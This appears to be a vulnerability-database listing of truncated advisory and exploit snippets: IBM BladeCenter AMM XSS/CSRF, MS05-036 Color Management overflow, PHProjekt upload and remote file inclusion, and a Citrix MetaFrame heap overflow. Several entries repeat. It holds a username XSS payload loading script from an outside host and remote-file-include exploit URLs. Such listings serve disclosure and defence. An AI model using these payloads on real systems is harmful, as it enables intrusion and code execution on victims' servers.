IBM BladeCenter高级管理模块跨站脚本和跨站请求伪造漏洞

BUGTRAQ ID: 34447 IBM BladeCenter是IBM的系列高性能刀片服务器。 IBM BladeCenter所使用的高级管理模块（AMM）的Web管理接口没有正确地过滤用户所提交的输入和请求。如果用户使用恶意的凭据试图登录的话，AMM会在事件日志页面记录用户所提交的凭据，之后管理员查看事件日志时就会执行所注入的内容。例如，攻击者可以使用以下用户名登录导致注入 JavaScript： /scriptscript src="//l7.fi"/scriptscript...

IBM BladeCenter Advanced Management Module multiple security vulnerabilities

Crossite scripting, information leak...

IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery

IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: - An HTML-injection vulnerability - A cross-site scripting vulnerability -...

IBM Bladecenter Advanced Management Module 1.42 - Login 'Username' Cross-Site Scripting

source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: - An HTML-injection vulnerability - A cross-site scripting vulnerability - An information-disclosure vulnerability - Multiple cross-site request-forger...

IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery

source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: - An HTML-injection vulnerability - A cross-site scripting vulnerability - An information-disclosure vulnerability - Multiple cross-site request-forger...

MS Windows Color Management Module Overflow Exploit (MS05-036)

No description provided by source. / Author: snooq http://www.redpuffer.net/snooq/web/ Date: 21 July 2005 When I looked at the PoC posted on bugtraq.... I was basically quite disappointed. The 'PoC' fixed 'tag count' to a large number.. but this code path does not seem to be exploitable...

Microsoft Color Management Module profile tag buffer overflow

Added: 11/30/2007 CVE: CVE-2005-1219 BID: 14214 OSVDB: 17830 Background The Microsoft Color Management Module helps programs achieve consistent display of colors. International Color Consortium ICC profiles are used to ensure that colors are represented accurately to users. Problem A buffer...

Microsoft Color Management Module profile tag buffer overflow

Added: 11/30/2007 CVE: CVE-2005-1219 BID: 14214 OSVDB: 17830 Background The Microsoft Color Management Module helps programs achieve consistent display of colors. International Color Consortium ICC profiles are used to ensure that colors are represented accurately to users. Problem A buffer...

Microsoft Color Management Module profile tag buffer overflow

Added: 11/30/2007 CVE: CVE-2005-1219 BID: 14214 OSVDB: 17830 Background The Microsoft Color Management Module helps programs achieve consistent display of colors. International Color Consortium ICC profiles are used to ensure that colors are represented accurately to users. Problem A buffer...

Microsoft Color Management Module profile tag buffer overflow

Added: 11/30/2007 CVE: CVE-2005-1219 BID: 14214 OSVDB: 17830 Background The Microsoft Color Management Module helps programs achieve consistent display of colors. International Color Consortium ICC profiles are used to ensure that colors are represented accurately to users. Problem A buffer...

Unrestricted file upload

Unrestricted file upload vulnerability in PHProjekt 5.2.0, when magicquotesgpc is disabled, allows remote authenticated users to upload and execute arbitrary PHP code via a file with an executable extension, which is then accessed by the 1 calendar or 2 file management module, or possibly...

CVE-2007-1639

PHProjekt 5.2.0 contains an unrestricted file upload vulnerability (CVE-2007-1639) that allows an authenticated user to upload a PHP payload and execute code via a file with an executable extension, when magic_quotes_gpc is disabled. The issue can be triggered through modules such as calendar or ...

Citrix MetaFrame IMA Management Module Remote Heap Overflow Vulnerability

This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Citrix MetaFrame Presentation Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the routine IMASECUREDecryptData1 defined in ImaSystem.dll and is...

phprojekt061.txt

Content management module for PHProjekt v0.6.1 Remote File Inclusion Vulnerability 2 Found By: D3nGeR E-Mail: [email protected] exploit: http://Target/Path/cmlib.inc.php?pathpre=http://cmd.gif? http://Target/Path/doc/br.edithelp.php?pathpre=http://cmd.gif?...

PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities

Exploit for unknown platform in category web applications ======================================================================== PHProjekt = 6.1 pathpre Multiple Remote File Include Vulnerabilities ======================================================================== Content management modul...

PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusions

source: https://www.securityfocus.com/bid/19628/info Multiple remote file-include vulnerabilities affect the Content Management module for PHProjekt because the application fails to properly sanitize user-supplied input before using it in a PHP 'include' function call. An attacker may leverage...

PHProjekt &lt;= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities

No description provided by source. Content management module for PHProjekt v0.6.1 Remote File Inclusion Vulnerability Download: http://www.mariovaldez.net/software/cm4p/files/cm4p0.6.1.tar.gz Found By: the master exploit: http://Target/Path/cmnavigation-33.inc.php?pathpre=http://cmd.gif?...

Microsoft Windows - Color Management Module Overflow (MS05-036) (2)

Microsoft Windows - Color Management Module Overflow MS05-036 2 / \ MS05-036 ICC Stack Overflow Exploit / by Darkeagle \ / GreetZ: all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, black, redsand \ / \ special tnx to snooq for his PoC. / \ / xploit was tested on WinXP SP1 RUS with explorer.exe \ /...

MS Windows Color Management Module Overflow Expl (MS05-036) (2)

Exploit for unknown platform in category remote exploits ================================================================== MS Windows Color Management Module Overflow Exploit MS05-036 2 ================================================================== / \ MS05-036 ICC Stack Overflow Exploit / b...

Microsoft Windows - Color Management Module Overflow (MS05-036) (2)

/ \ MS05-036 ICC Stack Overflow Exploit / by Darkeagle \ / GreetZ: all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, black, redsand \ / \ special tnx to snooq for his PoC. / \ / xploit was tested on WinXP SP1 RUS with explorer.exe \ / 02.08.05 \ / http://eagle.blacksecurity.org \ / include include...